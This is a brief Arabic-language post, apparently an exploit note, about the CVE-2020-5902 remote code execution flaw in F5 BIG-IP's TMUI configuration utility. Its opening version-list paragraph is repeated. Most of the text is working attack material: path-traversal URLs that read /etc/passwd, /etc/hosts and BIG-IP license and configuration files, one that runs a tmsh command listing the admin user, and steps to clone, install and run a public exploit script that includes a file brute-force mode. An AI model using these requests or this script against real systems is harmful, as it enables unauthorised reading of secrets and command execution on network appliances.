
في إصدارات BIG-IP 15.0.0-15.1.0.3، و14.1.0-14.1.2.5، و13.1.0-13.1.3.3، و12.1.0-12.1.5.1، و11.6.1-11.6.5.1، تحتوي واجهة إدارة حركة المرور (TMUI)، والتي يشار إليها أيضًا باسم أداة التهيئة، على ثغرة أمنية لتنفيذ التعليمات البرمجية عن بُعد (RCE) في صفحات غير معلنة.
في الإصدارات BIG-IP 15.0.0-15.1.0.3 و14.1.0-14.1.2.5 و13.1.0-13.1.3.3 و12.1.0-12.1.5.1 و11.6.1-11.6.5.1، تحتوي واجهة إدارة حركة المرور (TMUI)، التي يشار إليها أيضًا بأداة التهيئة، على ثغرة أمنية لتنفيذ التعليمات البرمجية عن بُعد (RCE) في صفحات غير معلنة.
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
git clone https://github.com/yasserjanah/CVE-2020-5902
cd CVE-2020-5902/
pip3 install -r requirements.txt
python3 exploit-CVE-2020-5902.py -ip <IP> -f /etc/passwd
-b to brute force files from a wordlist
python3 exploit-CVE-2020-5902.py -ip <IP> -b